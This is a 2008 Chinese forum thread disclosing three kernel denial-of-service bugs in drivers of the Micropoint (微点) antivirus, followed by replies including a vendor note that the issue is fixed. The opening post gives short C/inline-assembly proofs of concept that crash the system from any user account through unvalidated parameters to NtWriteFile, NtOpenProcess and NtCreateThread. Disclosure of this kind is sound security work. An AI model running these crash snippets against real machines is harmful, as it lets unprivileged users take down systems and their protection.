Board logo

标题: 微点主动防御(version20080924及以下)多个内核拒绝服务漏洞之三 [打印本页]
作者: mj0011_decoder     时间: 2008-10-1 18:49    标题: 微点主动防御(version20080924及以下)多个内核拒绝服务漏洞之三

继续爆三个漏洞,微点一直没反映啊~看来都度假去了 这样可不行啊 病毒木马可是不休假的哦 O(∩_∩)O哈哈~

(1).微点对NtWriteFile-> Call ObReferenceObjectByHandle的HOOK中未对参数做有效性检查,可导致任意权限用户在安装了微点的系统上可引发系统蓝屏

存在漏洞的文件:mp110011.sys,版本:1.2.10237,CheckSum = 0x0002291a , TimeStamp = 0x488944d9


微点hook了NtWriteFile-> Call ObReferenceObjectByHandle并对其中的FileHandle进行检查,检查对应的设备对象->驱动对象是否是Disk,如果是的话,判断写入的偏移,进行阻截或放行

其中hook函数使用读取外层函数(NtWriteFile)保存的栈指针(ebp)来读取外层函数的参数pByteOffset,但未对该参数做有效性检查,就直接使用,导致了攻击的可能


使用以下代码即可在任意用户权限在使安装了微点的系统蓝屏:

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwWriteFile");

HANDLE hfile = CreateFile("\\\\.\\PhysicalDrive0" , FILE_WRITE_DATA , 0 , 0 , OPEN_EXISTING , 0 , 0 );
if (hfile != INVALID_HANDLE_VALUE)
{
   __asm
   {
    push 0
    push    1 //->pByteOffset,cannot be zero
    push   0
    push 0
    push 0
    push 0
    push 0
    push 0
    push hfile
    call p

   }
}

(2).微点在对NtOpenProcess的头部inline hook中,未进行任何参数检查就直接使用参数,导致任意权限用户可引发安装了微点的系统蓝屏

mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 0x4859C30E)

在其处理函数中未做任何参数检查,直接使用了参数pClientId 的缓存地址,也没有结构化异常处理,因此直接传递0地址即可使系统蓝屏

测试代码:

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "NtOpenProcess");

__asm{
   push 0
   push 0
   push 1   //access must have "PROCESS_TERMINATE"
   push 0
   call p

}


(3).微点对于NtCreateThread的HOOK处理中存在拒绝服务漏洞,可导致任何权限用户在安装了微点的系统上引发蓝屏

mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 0x4859C30E)

在其函数中未对参数pContext做任何检查,就使用该参数,并且没有使用任何结构化异常处理,因此只要传0就可以导致蓝屏

测试代码:

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "NtCreateThread");

__asm{

   push 1 //need createsuspend:)
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   call p

}
作者: 点饭的百度空间     时间: 2008-10-1 20:11
多几个郑文彬这样的测试用户就好了
作者: yurong7777777     时间: 2008-10-2 08:00
反映得很好,微点就需要这样“挑刺“的人,唯有如此,微点才能进步
作者: snhao     时间: 2008-10-2 10:00
真的假的?楼主是郑文彬?
作者: 408983504     时间: 2008-10-2 10:07


  Quote:
Originally posted by snhao at 2008-10-2 10:00:
真的假的?楼主是郑文彬?

郑文彬?何许人也??
作者: Legend     时间: 2008-10-6 14:10
问题已解决,请楼主用最新的安装包进行测试,如有问题,欢迎再次发帖。(可以联系QQ:383154254 为好友,找他要下新包)
作者: comewhere     时间: 2008-10-8 15:12
貌似预升级版 还是会 挂掉..



欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/) bbs.micropoint.com.cn